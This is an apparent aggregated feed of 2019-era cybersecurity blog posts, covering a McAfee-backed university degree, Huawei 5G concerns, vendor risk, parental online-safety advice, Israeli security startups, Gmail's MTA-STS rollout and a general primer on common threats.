One step that McAfee is investing heavily in is education. We are already doing a lot of work to support students and inspire them to take on careers in cybersecurity, for example our work in the UK with high school programs run at the home of the World War II code breakers Bletchley Park.

Now we’re delighted to be expanding this work even further as a founding partner of the new Master of Cybersecurity and Threat Intelligence at the University of Guelph which will launch in September this year. This graduate degree will train the next generation on how to stop cyberattacks before they happen, and give students expertise in threat intelligence, threat hunting, digital forensics, intrusion prevention, privacy, crypt analysis and more.

During the course, students will work with state-of-the-art cybersecurity tools where they can run real-world attacks within an isolated lab, engaging directly with active adversaries and learn their tactics, techniques and procedures to build state of art cyber defense and detection systems. They will learn the intricacies of how attacks are conducted and methods for preventing further intrusions. McAfee has already been involved with the development of the Lab, ensuring it replicates our real-world labs to give students the right experience from the very beginning.

But we’re not just supporting the lab. Alongside partners including Cisco and BlackBerry, we’re also going to be showing up throughout the course and inviting students to work closely with us inside McAfee to build the skills they need for a future career in cybersecurity.

As a Canadian, I am particularly proud that a Canadian institution is showing this level of innovation which will enhance not only our local talent pool but will also help solve the global talent shortage.

To learn more, and apply to be one of the founding class, visit the University of Guelph here.

The post Why McAfee is Supporting the University of Guelph’s New Cyber Security and Threat Intelligence Degree Program appeared first on McAfee Blogs.

Top Cybersecurity Concerns with Huawei 5G Dominance

The Internet of Things (IoT) is creating a need to progress cellular capabilities to provide necessary support to currently 14 billion IoT devices connected globally and growing to between 20 and 50 billion devices by 2020 (Gartner and Cisco). This includes current mobile devices, computers, smart speakers and televisions, and will include more items like digital locks, security cameras, vehicles, and household appliances. Currently, the IPv4 address space is sparse and the Internet Engineering Task Force (IETF) ratified IPv6 as an Internet Standard in July 2017. The growth of connected devices requires a larger IP scheme and network infrastructure that supports the connectivity of billions of devices at high speeds.

The next iteration for robust infrastructure is 5G, providing bandwidth up to 20 gigabits per second.  This will be implemented this year, but a complete transition will take many years, which Huawei, a Chinese Corporation, is currently leading in technology. Huawei is the second largest provider of cellular phones worldwide and the largest manufacturer of network equipment.

The U.S. Government has taken a decided stance to block the use of Huawei in the United States, filing a complaint that bans all government agencies from engaging in purchasing from Huawei and bars third parties who use the company’s equipment (BBC). Huawei is currently suing the United States because of the ban. The U.S. is not the only country taking a cautious stance with Huawei, however. They’re joined by Germany, Great Britain, Australia, Canada, and Japan, all of which are citing major security concerns with the company (MIT Technology Review).

Security Concerns with Huawei dominating the 5G space:

1.  Security Vulnerabilities in Reconfiguring Networks

The first concern is that newer 5G network equipment is almost entirely software and constantly reconfigures, challenging security agencies, who examine equipment and software for vulnerabilities and security flaws or backdoors (FreshAir). When an organization is unable to identify weaknesses in devices with constantly changing software, it becomes impossible to implement security controls to limit vulnerabilities to an acceptable level, making an organization’s or state’s data accessible.

2.  Espionage & Interference

The second concern is the possibility of China using Huawei to conduct espionage or disrupt communications. A seven-month investigation into China’s Intellectual Property (IP) theft, led by the United States Trade Representative, estimates Chinese theft of American IP has cost the U.S. between $225 billion to $600 billion annually (CNN).

China has also used the Internet to enable rampant government oppression within their borders and is now focusing on other countries and foreign businesses. China is blocking and changing data, both coming into the country and going out of the country, using what Weaver, a network security expert at the International Computer Science Institute, has coined the Great Cannon (MIT Technology Review).

It is also concerning that China will likely continue to use the Internet to control narratives, as they did when Marriott listed Tibet and Hong Kong as separate countries from China, forcing an apology from the hotel chain. Chinese officials are also going after other companies that “misidentify” Taiwan (MIT Technology Review).

3.  Foreign Nation-State Controlled Networks

The third concern, and biggest security concern for the United States, is the vastness of a network controlled by a foreign company and potentially adversarial government. As Sanger (2019) reports, “classified intelligence reports from the U.S. have warned that China would one day use Huawei to penetrate American networks for cyber-espionage or cyberattacks.” Chinese private industry and the State are tightly tied with companies being answerable to the government. Current Chinese laws state that any Chinese telecom companies would have to participate in Chinese intelligence operations (BBC).

If Huawei controls the 5G network infrastructure, the company and the Chinese government have a tremendous advantage to collect, disseminate, and control data and critical infrastructure. With IoT expanding the attack surface it is important for countries and companies to advance their security.

Because of the persistent threat environment, companies require an adaptive security program.  Hiring a Managed Security Service Provider (MSSP) to implement a security solution would help U.S. companies prepare for current and future threats by monitoring, analyzing, encrypting, and assisting in security strategies against adversarial entities.

The post Top Cybersecurity Concerns with Huawei 5G Dominance appeared first on GRA Quantum.

Employees Share Stories Working in Award–Winning Cork Office

“The culture at McAfee is easy going, fun, dynamic and everyone is friendly.”—Deirdre, Project Manager

The McAfee office in Cork was once again named among companies recognized in Ireland’s Great Place to Work awards. Our Cork location has much to offer—from a supportive working environment to career growth opportunities, the opportunities are abundant.

Hear from three McAfee employees, Deirdre, Ranjit and Oliver, as they share their personal stories of working in the Cork, Ireland office.

Want to join in on the fun? We’re hiring in Cork! Apply now.

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

The post Employees Share Stories Working in Award–Winning Cork Office appeared first on McAfee Blogs.

Federal, State Cyber Resiliency Requires Action

It is no shock that our state and local infrastructures are some of the most sought-after targets for foreign and malicious cyber attackers, but the real surprise lies in the lack of preventive measures that are able to curb them. Major attention has been drawn to the critical gaps that exist as a result of an ever-expanding attack surface, making old system architectures an increasing liability.

Recently, the city of Albany, New York became a victim of a ruthless ransomware attack, which created a series of municipal service interruptions. Residents weren’t able to use the city’s services to obtain birth certificates, death certificates or marriage licenses, and the police department’s networks were rendered inoperable for an entire day. This resulted in an enormous disruption of the city’s functionality and made clear that the threat to infrastructure is more real than ever. Bolstering state and local digital defenses should be of the utmost priority, especially as we near the 2020 presidential elections when further attacks on election infrastructure are expected. We must take the necessary precautions to mitigate cyberattack risk.

The reintroduction of the State Cyber Resiliency Act by Senators Mark Warner (D-VA) and Cory Gardner (R-CO), and Representatives Derek Kilmer (D-WA) and Michael McCaul (R-TX), does just that. The legislation demonstrates a critical bipartisan effort to ensure that state, local and tribal governments have a robust capacity to strengthen their defenses against cybersecurity threats and vulnerabilities through the Department of Homeland Security (DHS). States have made clear that they suffer from inadequate resources to deal with increasingly sophisticated attacks, but also the most basic attacks, which require proper safeguards and baseline protection. This bill works to strategically address the challenges posed by a lack of resources to deal with emerging threats.

The possibility of cyber warfare must not be taken lightly and has long gone ignored. This bill shows that the status quo of kicking the can further down the road will no longer stand as a “strategy” in today’s political and cybersecurity landscape. Action is necessary to better secure our national security and the systems upon which every sector of our economy relies, from utilities to banking to emergency first responders to hospital networks to election infrastructure. It is our responsibility to create and support the safeguards against bad actors looking for gaps in our infrastructure.

The bill makes states eligible for grants to implement comprehensive, flexible cybersecurity plans that address continuous vulnerability monitoring, protection for critical infrastructure systems and a resilient cybersecurity workforce. States would also be able to repurpose funds to various local and tribal governments. In addition, the bill would implement a 15-person committee to review the proposed plans and track the spending of state and local governments. This committee would help states and localities formulate and deliver annual reports to Congress that detail the program’s progress. The specific funding was not disclosed, but this effort showcases the timeliness of the issue and why it is such an imperative step at this stage in time.

We must take basic steps to ensure the security of our state and local systems, and enable systems to be patched, maintained and protected from outside threats. This bill is a welcomed and needed effort by lawmakers to address the existing challenges states and local governments and infrastructures are dealing with every day.  As adversaries become increasingly sophisticated and targeted in their attack strategies, we have a responsibility to best equip states and localities with the necessary tools to close gaps and mitigate gaps.

We at McAfee are committed to partnering with federal, state and local governments to equip them with the best strategies to create a better and more secure cybersecurity future.

The post Federal, State Cyber Resiliency Requires Action appeared first on McAfee Blogs.

Third Party Security Risks to Consider and Manage

Guest article by Josh Lefkowitz, CEO of Flashpoint
 
Acceptable business risks must be managed, and none more so than those associated with external vendors who often have intimate access to infrastructure or business data. As we’ve seen with numerous breaches where attackers were able to leverage a weaknesses a contractor or service provider, third-party risk must be assessed and mitigated during the early stages of such a partnership, as well as throughout the relationship.
 
The following tips can help security decision makers more effectively address the risks posed by relationships with technology vendors.
 
Do Your Homework
Conducting thorough due diligence on a prospective vendor is essential. Organisations could evaluate technical and regulatory risk through due diligence questionnaires, for example, or even on-site visits if necessary. The point is to evaluate not only a third party’s information security risk, but compliance with regulations such as GDPR for privacy and PCI DSS for payment card security, for example. An organisation may also want to evaluate a third party’s adherence to industry standards such as NIST or ISO in certain security- and privacy-related areas.
 
Next, consider what this compliance information doesn’t tell you. What do you still need to learn about the vendor’s security posture before deciding whether you’re comfortable with it? Think about what questions you still have and, if possible, seek answers from the vendor’s appropriate security contact. Here are some questions to pose: 
When was your last penetration test? Is your remediation on schedule?
  • Have you documented security incidents? How did you remediate those incidents?
  • Do you have the result of your last business continuity test? If yes, can you share it?
  • What security controls exist for your users? Do they use multifactor authentication, etc.?
  • How are you maturing your security program?
  • Are you ISO, SOC 1/SOC 2, and NIST Compliant, and is there documentation to support this? 
Additional Security: It’s All in the Controls
If you’re unsatisfied with the answers from a potential partner regarding their security, it’s OK to walk away, especially if you make the determination that working with the vendor may not be critical to your business.  

That’s not always the case, however. If you must partner with a particular third party and if no other reputable vendors offer anything comparable, you will likely need to implement additional technical and/or policy controls to mitigate the security risks associated with your business’s use of the offering, such as:
 
Technical
These are typically restrictions on the access and/or technical integrations of vendor offerings. For example, if a product is web-based but unencrypted, consider blocking users on your network from accessing its website; provided the proper authentication is in place, use its API instead. In most cases, there are two options, remediation or compensating controls:
  • Remediation: Can you work with the vendor to remediate the technical risk?
  • Compensating controls: If you cannot remediate the risks entirely, can you establish technical compensating controls to minimise or deflect the risk?
Policy
These are policies that users of the offering should follow, such as limits on the types and amounts of data that can be input securely. Some typical policy scenarios include:
  • Regulatory compliance: For example, a vendor’s non-compliance could mandate you walk away from a third-party relationship.
  • Contractual obligations: Are there contractual obligations in place with your existing clients that prevent you from working vendors who don’t meet certain security and privacy standards?
  • Security best practices: Ensure your policies around risk are enforced and determine whether they may conflict with your vendors’ policies.
Asset Inventory is a Must
There are several reasons why it’s imperative to know which of your business’s assets the vendor will be able to store and/or access. For one, this knowledge can help identify and shape any additional security controls. Second, having this knowledge on hand is crucial should the vendor suffer a breach. Knowing exactly what assets were impacted, as well as who is doing what with your inventory, can expedite your response and identify and mitigate any exposure efficiently and effectively.
 
Response Plans Must Include Partners
Before finalising a vendor relationship, it’s crucial to use all the information gathered during your due diligence process to construct a response plan in preparation for any future incidents the vendor might experience. Tracking the assets to which your vendor has access is one component of an effective response plan. Others include courses of action to mitigate exposure, disclosure and notification procedures, external communications strategies, and plans to re-evaluate the vendor’s security and remediation following an incident.
 
The most effective way to manage vendor risk is not to work with any external vendors in the first place, which isn’t a feasible strategy. The most secure and successful vendor relationships are rooted in preparation and transparency. Thoroughly understanding all facets of a vendor’s security program, implementing additional controls as needed to appropriately safeguard your business’s assets, and being prepared to respond to future incidents can go a long way toward reducing business risks associated with any vendor relationship.
Josh Lefkowitz, CEO of Flashpoint

Social Underground: Kids Using Google Docs as New Digital Hangout

Over the years kids have succeeded in staying one step ahead of parents on the digital front. Remember the golden days of social? Teens owned Facebook until every parent, auntie, and grandparent on the planet showed up. So, teens migrated to Instagram, Twitter, and Snapchat hoping to carve out a private patch of land for their tribe. And, according to a report in The Atlantic, the latest app these digital nomads have claimed as a covert hangout surprisingly is Google Docs.

Yes — Google Docs — that boring looking online tool many of us parents use at work to collaborate on projects. Google Docs is perfect when you think about it. The app can be accessed on a tablet, laptop, or as a phone app. It allows multiple users to edit a document at the same time — kind of like an online party or the ultimate private group chat.

To interact, kids can use the chat function or even highlight words or phrases and use a comment bubble to chat. Because teachers use the application in the classroom, kids are using Google Docs to chat during class without getting busted or dupe parents at home into thinking they are doing their homework.

Another big perk: Schools have firewalls that block social networking sites during school hours, but Google Docs is officially cleared for school use.

The Risks

As with any app, what begins as a covert, harmlessly chat channel between friends, can get malicious quickly as more and more people are invited into a shared document to talk.

Kids can easily share videos, memes, and hurtful, joking, or inappropriate content within a Google Doc. They can gang up on other kids and bully others just as they do on any other social network. Similar to the way images disappear on Snapchat in 24 hours or on Instagram stories, the “resolve” button on Google Docs chat function, allows kids to instantly delete a chat thread if a teacher or parent heads their way or hovers too closely.

Because Google Docs live on the cloud, there’s no need to download or install a piece of software to use or access it. Any device connected to the Internet can access a Google Doc, which means kids can also use it as a digital diary without a digital trail and hide potentially harmful behaviors from parents.

10 Ways to Coach Your Kids Around Digital Safety 

  1. Know where they go. Just as you’d ask where your child where he or she is going offline, be aware of their digital destinations online. Check on them during homework hours to be sure they aren’t chatting away their learning time.
  2. Check for other apps. If you’ve grounded your child from his or her smartphone for any reason, and they claim they have online homework to do, check their laptops and tablets for chat apps like Kik, WhatsApp, hidden vault apps, and of course, as we now know, Google Docs (see right for the icon).
  3. Remember, it’s forever. Even if an image or video is “resolved” on Google Docs, deleted on Instagram or Twitter, or “vanishes” on Snapchat, the great equalizer is the screenshot. Anyone can take one, and anyone can use it to bully, extort, or shame another person anytime they decide. Remind kids of the responsibility they have with any content they share anywhere online — privacy does not exist.
  4. Sharing is caring. If your child is on Google Docs and you have a hunch, they aren’t doing homework, ask them to share their document with you so you can monitor their work. Just hit the big blue “share” button and insert your email address and you will have immediate access to the homework document.
  5. Keep in touch with teachers. If your child’s grades begin to slip, he or she could be distracted at school. Ask about what apps are used in the classroom and alert the teacher if you think your child might be distracted be it with technology or anything else.
  6. Parental controls. Hey, we’re busy because we’re parents. Enlist some help in monitoring your child’s online activity with parental control software. This will help you block risky sites, limit excessive app use, and give you a report of where your kids spend most of their time online.
  7. Look for red flags. Everyone needs and desires privacy even your teen. The tough part is discerning when a teen is being private or trying to hide risky behavior. A few red flags to look for include defensiveness when asked about an app or chat activity, turning off a device screen when you come around, and getting angry when you ask to see their screen. Another sign of unhealthy app use is an increase in data use and fatigue at school from lack of sleep.
  8. Connect with other parents. Here’s the snag in the whole plan: The rules that apply to homework and devices at your house, may not apply at other people’s homes where kids often study. Bullying or inappropriate online behaviors often take place under other people’s roofs. So get intentional. Keep in touch with other parents. Find common ground on digital values before letting kids go offsite for homework time.
  9. Talk, talk, talk. Your best defense in keeping your kids safe online — be it using apps or other sites — is a strong offense. Talk with your kids often about what they like to do online, what their friends do, and address digital issues immediately.
  10. Be flexible. Parental monitoring is going to look different in every family. Every child is different in maturity, and every parent-child relationship varies greatly. Find a monitoring solution that works for your family. Coming down too hard on your kids could drive them into deeper secrecy while taking a hands-off approach could put them in danger. Try different methods until you find one that fits your family.

Remember: You won’t be able to keep your finger on everything your child is up to online, but you can still have a considerable influence by staying in the know on digital trends and best online safety practices.

The post Social Underground: Kids Using Google Docs as New Digital Hangout appeared first on McAfee Blogs.

Protect Your Privacy Spring Cleaning

I’ll be honest, my blog idea was generated from an article about spring cleaning.  Let’s face it, lots of things could benefit from spring cleaning:  homes, cars, desk drawers… How about your inbox?  Maybe the ever-growing number of presentation drafts in your documents folder?  How about the flash drive in your desk drawer?  Anything in […]

The post Protect Your Privacy Spring Cleaning appeared first on Privacy Ref Blog.

PCI Standards in 2019: Q&A with CTO Troy Leach


What do stakeholders need to know about PCI Security Standards in 2019? PCI SSC Chief Technology Officer Troy Leach provides an update on what to expect for changes to existing standards and a look at those in development this year.  

What to Know About the New Card Production Security Assessor Program


PCI SSC is in the process of launching a new program to train and qualify security professionals to perform assessments using the Card Production Security Standards. Gill Woodcock, Senior Director of Certification Programs, provides an update on this effort and how it will improve the security of payments.

Most Promising Israeli Cybersecurity Startups for 2019

Around 450 cybersecurity companies are operating in Israel, constituting 5% of the global cybersecurity market. The cybersecurity industry was founded in Israel in the late 80s, with the establishment of several local companies that developed anti-virus software and information security. To understand the impact of Israeli companies on the global market, we can mention a few of the well-known Israeli cyber companies: Check Point, Radware, CyberArk, Imperva.

The cybersecurity industry in Israel, which is an important part of Israel’s software industry, includes a wide range of companies that protect from cyber warfare and cybercrime. The sector includes companies operating in it for a long time as independent companies, together with start-up companies that were sold to foreign companies, they continue to operate in Israel as development centers of the acquiring companies. In the list below we will mention the most promising Israeli cybersecurity companies for 2019. We’ve created this list to give an overview of startups that our industry needs to track and be aware of. The companies below are operating in Israel or founded by Israelis, they all award-winning companies. To see the full list of Israeli cybersecurity companies please check our database.

Our list of Most Promising Israeli Cybersecurity Startups for 2019

breach and attack simulation XM CyberXM Cyber

In order to prevent cyber-attacks, organizations should identify in advance attack vectors that hackers will utilize to compromise their critical assets. Moreover, security holes should be remediated as soon as they are created and before attackers utilize them.

XM Cyber’s multi-award-winning breach and attack simulation (BAS) platform identifies continuously attack vectors and prioritizes remediation. The platform provides organizations with a clear understanding, at any given time, of where and how hackers will compromise their crown jewels. XM Cyber was founded by executives from the Israeli cyber intelligence community and has offices in the US, UK, Israel and in Australia.


SilverfortSilverfort

Corporate networks are going through dramatic changes due to IT revolutions like cloud, IoT and BYOD. With countless devices and services connected to each other without clear perimeters, users must be authenticated before accessing any sensitive resources.

Silverfort delivers strong authentication across complex corporate networks and cloud environments, without requiring any software agents, proxies or local configurations. Silverfort seamlessly enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, homegrown applications, critical infrastructure and more. Silverfort enables enterprises to prevent data breaches, comply with regulatory requirements and migrate sensitive assets securely to the cloud.


SixgillSixgill

Cybersecurity companies often rely on manual or semi-automatic processes to gather and analyze intelligence, creating a lengthy, expensive and ineffective intelligence cycle that fails to mitigate threats.

Founded in 2014, Sixgill provides cyber threat intelligence solutions based on coverage of exclusive-access to deep and dark web sources, to enterprises around the world including Fortune 500 companies, financial institutions, and law enforcement agencies.

In 2017, Sixgill was awarded a “Top 10 Most Innovative and Promising Companies of the World” at the Netexplo/UNESCO Paris conference and was included in the Disrupt 100. In 2016, Sixgill was named one of the “Top 5 Most Innovative Companies” at CyberTech Tel Aviv.


API Security Salt SecuritySalt Security

Salt Security protects the APIs at the core of every SaaS, web, mobile, microservices and IoT application. Its API Protection Platform is the first patented solution to prevent the next generation of API attacks, using behavioral protection. Deployed in minutes, the AI-powered solution automatically and continuously discovers and learns the granular behavior of APIs and requires no configuration or customization to ensure API protection.

The company was founded in 2016 by alumni of the Israeli Defense Forces (IDF) and serial executives in cybersecurity and in 2019 was selected as a finalist for the RSA Innovation Sandbox.


IntezerIntezer

Intezer’s Genetic Malware Analysis technology identifies code reuse among trusted and malicious software to detect advanced cyber threats. The technology determines whether a file is trusted or malicious, while also classifying the malicious file to its relevant malware family and providing information about the level of sophistication and the threat actor behind the attack, within seconds. The company also offers a free community edition where users can detect code reuse to obtain insights about malware families and threat actors.
Fortune 500 companies leverage Intezer to automate their malware analysis and classification and reduce false positives — improving security operations and accelerating incident response. The company’s technology has provided crucial insights in several high profile cyber attacks before leading engines and government agencies, including APT28, MirageFox, NotPetya and WannaCry.

Intezer was named a Cybersecurity Excellence Awards 2019 winner for Best Cybersecurity Company and Cyber Defense Magazine Infosec 2019 award winners for Cutting Edge Malware Analysis and Incident Response. The company was named an SC Awards USA finalist in the category of Newcomer Security Company of the Year.


Protego’s serverless securityProtego

Serverless applications require unique security solutions. Founded in 2017, Protego’s comprehensive SaaS solution helps organizations embrace serverless technology securely.

The Platform:

· Saves developers & DevSecOps time by automating application hardening & governance within existing pipelines.

· Provides CloudAppSec with serverless app visibility & seamless run-time security with function self protection.

Protego won the 2019 Cybersecurity Excellence Awards for Best Startup and was named a 2019 Company to Watch by SDTimes Magazine. In 2018, Protego won an Innovator Award from SC Magazine, received Frost & Sullivan’s Global New Product Innovation Award, and won most innovative initiative at the CyberTech Tel Aviv Conference.


SepioSepio

Sepio is disrupting the cyber-security industry by uncovering hidden hardware attacks. Sepio Prime provides security teams with full visibility into their hardware assets and their behavior in real time. A comprehensive policy enforcement module allows administrators to easily define granular device usage rules and continuously monitor and protect their infrastructure. Leveraging a combination of physical fingerprinting technology together with device behavior analytics, Sepio’s software-only solution offers instant detection and response to any threat or breach attempt coming from a manipulated or infected element.

Sepio Systems recently was awarded by Frost & Sullivan the Best Practice and Technology Leadership award for RDM (Rogue Device Mitigation) market.


ReblazeReblaze

Founded in 2012, Reblaze is a cloud-based, fully managed protective shield for sites and web applications. Hostile traffic is blocked in the cloud, before it reaches the protected network.
Reblaze is a comprehensive web security solution, providing a next-gen WAF, DoS and DDoS protection, bot mitigation, scraping prevention, CDN, load balancing, and more.
The platform offers a unique combination of benefits. Machine learning provides accurate, adaptive threat detection. Dedicated Virtual Private Clouds ensure maximum privacy. Top-tier infrastructure assures maximum performance. Fine-grained ACLs enable precise traffic regulation. An intuitive web-based management console provides real-time traffic control. A one-month trial offer allows you to assess Reblaze with no cost, risk, or obligation.


Regulus CyberRegulus Cyber

Regulus Cyber offers Defense for Sensors used in Automotive, Maritime and Aviation.
Being the first company focusing entirely on sensor security solutions that protect commonly used sensors for both manned and unmanned systems. The product called Pyramid is offering real-time protection against jamming and spoofing attacks.
These attacks can disable or hack sensors such as GNSS, LiDAR, Radar and other mission-critical components.
Regulus Pyramid has won several awards including AUVSI Excellence 1st place cybersecurity winner and The Cyberstorm Startup Competition and received $6.3 million in funding from leading VCs in Israel and Silicon Valley.


MorphisecMorphisec

Morphisec fundamentally changes the cybersecurity scene by shifting the advantage to defenders, keeping them ahead of attacks with moving target defense.

Emerging from the national cyber security center and from some of the sharpest cyber security minds in Israel, Morphisec provides the ultimate threat prevention by making sure attackers never find the targets they seek.

 


This was our latest list of most promising Israeli cybersecurity startups fro 2019. We hope that you will find what you need. Feel free to contact us if you want to add a company to our list.

The post Most Promising Israeli Cybersecurity Startups for 2019 appeared first on CyberDB.

D.C. Area Crypto Day – Spring 2019

D.C. Area Crypto Day is a bi-annual, one-day regional meeting of cryptographic researchers to promote research collaborations and disseminate fresh, state-of-the-art results in cryptography. Previous D.C.

You Can Now Get This Award-Winning VPN For Just $1/month

If you use the internet (which you clearly do), you likely know how important it is to protect your data in an increasingly dangerous cyber environment. But like other essential tasks that tend to be tedious (like filing taxes early and brushing your teeth for the full two minutes), most installing and running a VPN can sound unappealing to many: sure, they encrypt your internet traffic and hide your location — but they can also run frustratingly slowly, delaying the way you’d usually use the internet for entertainment and work.

That’s where Ivacy VPN is different: not only will the speedy service let you browse and stream lag-free, it also offers real-time threat detection technology, removing malware and viruses at the server level. It ensures that all your downloads and devices stay totally secure, so you can stay safe online without being inconvenienced.

To read this article in full, please click here

Gmail making email more secure with MTA-STS standard



We’re excited to announce that Gmail will become the first major email provider to follow the new SMTP MTA Strict Transport Security (MTA-STS) RFC 8461 and SMTP TLS Reporting RFC 8460 internet standards. Those new email security standards are the result of three years of collaboration within IETF, with contributions from Google and other large email providers.

SMTP alone is vulnerable to man-in-the-middle attacks

Like all mail providers, Gmail uses Simple Mail Transfer Protocol (SMTP) to send and receive mail messages. SMTP alone only provides best-effort security with opportunistic encryption, and many SMTP servers do not prevent certain types of malicious attacks intercepting email traffic in transit.

SMTP is therefore vulnerable to man-in-the-middle attacks. Man-in-the-middle is an attack where communication between two servers is intercepted and possibly changed without detection. Real attacks and prevention were highlighted in our research published in November 2015. MTA-STS will help prevent these types of attacks.

MTA-STS uses encryption and authentication to reduce vulnerabilities

A MTA-STS policy for your domain means that you request external mail servers sending messages to your domain to verify the SMTP connection is authenticated with a valid public certificate and encrypted with TLS 1.2 or higher. This can be combined with TLS reporting, that means your domain can request daily reports from external mail servers with information about the success or failure of emails sent to your domain according to MTA-STS policy.

Gmail is starting MTA-STS adherence. We hope others will follow

Gmail the first major provider to follow the new standard, initially launching in Beta on April 10th 2019. This means Gmail will honor MTA-STS and TLS reporting policies configured when sending emails to domains that have defined these policies. We hope many other email providers will soon adopt these new standards that make email communications more secure.

Email domain administrators should set up DNS records and web server endpoint to configure MTA-STS and TLS reporting policies for incoming emails. Use our Help Center to find out how to set up an MTA-STS policy with your DNS server. G Suite admins can use the G Suite Updates blog to see what MTA-STS means for G Suite domains.

5 Most Common Types of Threats You Need to Know About

Cyber threats sometimes feel unrelenting and are becoming more dangerous every day. While the internet presents users with lots of information and services, it also includes several risks. Cyberattacks are increasing in sophistication and volume, with many cybercriminals using a combination of different types of attacks to accomplish a single goal. Though the list of potential threats is extensive, below you’ll see the most common security threats you should look out for.

1.  Malware

Short for “malicious software,” malware comes in several forms and can cause serious damage to a computer or corporate network. There are various forms of malware ranging from viruses and worms to Trojans and beyond. Malware is often seen as a catch-all term that refers to any software designed to cause damage to a computer, server, or network.

Antivirus software is the most known product to protect your personal devices against malware and is a great start to prevent potential threats. While for enterprises, protecting your endpoint is essential to quickly detect, prevent, and correct advanced threats to your business.

2. Computer Worm:

The distinctive trait of a worm is that it can self-replicate and doesn’t require human interaction to create copies and spread quickly and in great volume. Most worms are spread though tricking internet users and are designed to exploit known security holes in software. Since many employees use their phones for work-related tasks when they are not within the perimeter of their corporate firewall, businesses are at a high risk for potential worms. If a machine is infected, the worm can: corrupt files, steal sensitive data, install a backdoor giving cybercriminals access to your computer, or modify system settings to make your machine more vulnerable.

3. Spam:

Spam refers to unsolicited messages in your email inbox. From the sender’s perspective, spam is a great way to get their message across in an efficient and cost-effective way. While spam is usually considered harmless, some can include links that will install malicious software on your computer if the recipient clicks on it.

How do you recognize malicious spam? First off, if you don’t recognize the sender’s address, don’t open it. Also, if the email addresses you in a generic way, i.e. “Dear customer”, “Hi there” etc., don’t engage. Be aware of the embedded links and check if they have odd URL’s by hovering over them to see where it wants to direct you and if the destination URL matches the destination site you expect.

4. Phishing

Created by cybercriminals attempting to solicit private or sensitive information, phishing schemes tend to be the starting point of nearly all successful cyberattacks. Phishing schemes can disguise itself in many forms, whether its posing as your bank or a common web service, with the sole purpose to lure you in by clicking links and asking you to verify account details, personal information, or passwords. Many people still associate phishing threats with emails, but the threat has evolved beyond your inbox. Hackers are now employing text messages, phone calls, phony apps, and social media quizzes to trick an unwitting victim.

5. Botnet:

Botnet malware is a network of computers that have been hijacked or compromised, giving hackers the ability to control infected computers or mobile devices remotely. When the malware is launched on your computer or mobile device, it recruits your infected device into a botnet, and the hacker is now able to control your device and access all your data in the background without your knowledge.

A botnet can consist of as few as ten computers or hundreds of thousands, and when bots come together, they are a force to be reckoned with. If a botnet hits your corporate website, it can make millions of requests at once ultimately overloading the servers knocking the website offline, slow web traffic, or affect performance. As many businesses are aware, a website that is offline or has a long lag time can be very costly, resulting in a loss of customers or a damaged reputation.

 

For more information check out our Security Awareness Resources and Reports.

The post 5 Most Common Types of Threats You Need to Know About appeared first on McAfee Blogs.

On World Health Day, Give Your Children the Key to Good Digital Health

My morning walk route takes me past a school that usually has its assembly at 7:00 am. I catch glimpses of students praying, reading out the news, teachers giving talks and often stop to watch them do their morning drill. It’s an arresting sight – 500 kids in bright uniforms moving in a synchronized manner to drumbeats. The school is doing it right; light exercises before the start of the academic day helps to enhance positivity, concentration power, alertness and readiness to learn. After all it’s an age-old saying, ‘A healthy mind resides in a healthy body.’

Perhaps you are wondering why McAfee Cybermum is discussing health. Well, 7th April was World Health Day and what better time than this to have a heart-to-heart on good health, especially, good digital health?

Let’s accept it- we are parents, first and foremost, and our focus is always (even when we are sleeping or partying or just chilling) on our kids. All we want is to raise happy, well-adjusted kids who will be able to think rationally and act for themselves and know how to stay safe- both in the real and in the digital world.

When we were kids, outdoors was the place to be! Life centered around our gardens, parks and roads outside our houses; where we spent hours playing, chatting or just hanging around. Today’s digital kids also play and socialize a lot, but the bulk of it happens online. They have their favourite hanging out zones, gaming sites, digital libraries, social media etc. We all are quite tech-savvy and so, we are well aware how addictive digital activities can be as well as how the long hours spent online can have adverse effects on health and mind. This is why we worry when our kids prefer digital lives to the real one; we take measures like setting device-use rules and see red if the rules are breached.

But losing our cool isn’t the solution- we need to promote a balanced digital life, right from the day the little tykes mark their initiation into the digital world and educate them and act as their digital role models.

Here’s how you can ensure a healthy digital life for your kids:

Health is wealth

Play games, swim, run, exercise, go for treks! It’s also a good opportunity to show them that devices can be put to other uses besides gaming and socializing, viz; tracking activity and monitoring health statistics. When they are using devices, teach them the right postures so that they don’t strain their back or eyes.

Balance is the keyword

Often, we forget to practice what we preach- which, in this case, is to have some device-free hours. Keep your device away (a) when with family, (b) when there’s company, and (c) during bedtime. Children will protest and perhaps bawl, but will also learn a valuable lesson, rather two lessons – There are other sources of entertainment besides devices, and a NO means NO. While the first lesson is important to lead a balanced digital life, the second one is important for them in the real world too.

Fix up an activity schedule that includes household chores

Not only will this help to maintain digital balance, it will also give the child the first lesson in responsibility. Whether it is making their own beds, cleaning out their wardrobes or helping to wash the car or set the table, these are values you are teaching kids non-verbally. Even little tykes can do small tasks and trust me, it will make them feel proud. Just take care that the daily timetable doesn’t start resembling an army cadet’s training schedule.

Set clear-cut rules

This helps kids learn discipline. Stress on how excessive use is akin to misuse. Their daily schedule should specify timings for device use. If they breach the timings, bring it up immediately. Repeated breaches need to be tackled firmly. Maybe the privilege of using the device needs to be surrendered for a few days. This, you as a parent need to decide.

Let them know you will be remotely monitoring their activities

It’s recommended that you mentor kids in the digital world till they are mature enough to handle matters responsibly themselves. Use parental controls that come with comprehensive security tools like McAfee Total Protection or McAfee LiveSafe and keep the admin password a secret. BUT LET YOUR KIDS KNOW you would be supervising them online. Explain it’s similar to how you keep an eye on them at public places. Remember to set internet timings and filters.

Have purposeful family activity time

Use that evening hour before or after dinner to chat, play board games, tell stories or discuss the news. Share, play, connect- the perfect ingredients for a close-knit family! And of course, all devices, including the digital assistant, is off-limit during this time.

Teach kids to be upstanders

Online abuse can lead to emotional disturbances in vulnerable kids. Even adults are negatively affected by cyberbullying and trolling and so you can understand the impact of such behavior on kids. Give your kids the security of your love and trust so that they grow up to be strong and confident and can stand up against bullies.

Discuss cybersafety often and with due seriousness

Living in the connected age, where we all use the same router for our devices along with other smart devices like CCTV, digital assistants etc., it is important to reinforce how the carelessness of one can affect the safety and privacy of all other family members. A safe and secure net connection is needed for mental wellness.

So, what are you waiting for? Start working on your family’s digital health today!

The post On World Health Day, Give Your Children the Key to Good Digital Health appeared first on McAfee Blogs.

What you don’t know may (pleasantly) surprise you

